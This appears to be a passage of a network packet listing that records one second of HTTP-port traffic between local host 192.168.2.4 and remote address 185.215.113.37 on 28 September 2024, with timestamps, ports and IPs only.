Sep 28, 2024 21:26:14.934989929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935029030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935039997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935050011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935081959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935112953 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935204029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935214043 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935224056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935234070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935241938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935251951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935262918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935261965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935291052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935307026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935463905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935473919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935482979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935489893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935518980 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935568094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935616970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935627937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935636044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935643911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935655117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935663939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935669899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935708046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935708046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935882092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935893059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935902119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935911894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935924053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935931921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935940027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935944080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.935993910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935993910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.935993910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936208010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936218023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936227083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936235905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936247110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936255932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936263084 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936266899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936290026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936321020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936501980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936511993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936562061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936672926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936682940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936693907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936702967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936713934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936724901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936729908 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936738014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936753035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936755896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.936778069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936778069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.936809063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937071085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937081099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937089920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937099934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937110901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937120914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937131882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937133074 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937140942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937151909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937163115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937163115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937199116 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937200069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937519073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937530041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937536955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937545061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937553883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937563896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937575102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937577009 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937587976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.937601089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937628031 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.937653065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953025103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953078032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953088045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953099012 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953154087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953154087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953205109 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953214884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953224897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953233957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953258038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953286886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953442097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953453064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953461885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953473091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953499079 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953531981 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953679085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953689098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953696966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953728914 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953759909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953821898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953831911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953840971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.953865051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.953896999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.954982996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955025911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955034971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955049038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955081940 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955151081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955159903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955169916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955180883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955209017 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955209970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955236912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955414057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955425024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955432892 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955442905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955452919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955462933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955472946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955498934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955528975 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955694914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955745935 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955775023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955785036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955821037 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955852985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.955933094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955943108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955951929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955960989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955971003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.955981016 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.956016064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.956016064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.956253052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.956263065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.956271887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.956279993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.956290007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.956300974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.956310987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.956335068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.956358910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.026063919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026129007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026139975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026158094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.026236057 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.026282072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026290894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026300907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026313066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026463985 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.026740074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026748896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026801109 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.026935101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.026992083 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.026999950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027009964 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027054071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027091026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027101040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027108908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027152061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027152061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027235031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027288914 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027298927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027309895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027369022 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027436018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027445078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027455091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027465105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027482033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027520895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027656078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027673960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027714968 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027740955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027751923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027756929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027782917 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027813911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027895927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027905941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027914047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027928114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.027946949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.027976990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028142929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028153896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028162956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028173923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028202057 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028234959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028299093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028309107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028348923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028373957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028383970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028393030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028403044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028414011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028420925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028423071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028440952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028476000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028791904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028803110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028811932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028821945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028831959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028841019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028846979 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028856993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.028873920 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028873920 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.028925896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029122114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029131889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029148102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029156923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029166937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029176950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029177904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029187918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029197931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029198885 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029210091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029217005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029220104 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029241085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029259920 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029735088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029743910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029752970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029762983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029772043 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029782057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029792070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029794931 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029802084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029812098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029823065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029831886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029833078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.029831886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029859066 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.029886007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.046906948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.046996117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.046998978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047008991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047024012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047034025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047050953 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047075987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047179937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047189951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047198057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047207117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047218084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047240973 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047240973 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047278881 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047370911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047382116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047435045 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047435999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047503948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047513962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047523022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.047553062 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.047583103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.049510956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049560070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049563885 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.049570084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049599886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.049704075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049714088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049722910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049731970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049741983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049753904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.049804926 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.049804926 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.049935102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049947977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049958944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049968958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049978971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.049989939 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.049990892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050024986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050040960 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050149918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050158978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050196886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050313950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050323009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050331116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050339937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050348997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050359011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050363064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:15.050369024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:15.050380945 CEST	80	49732	185.215.113.37	192.168.2.4
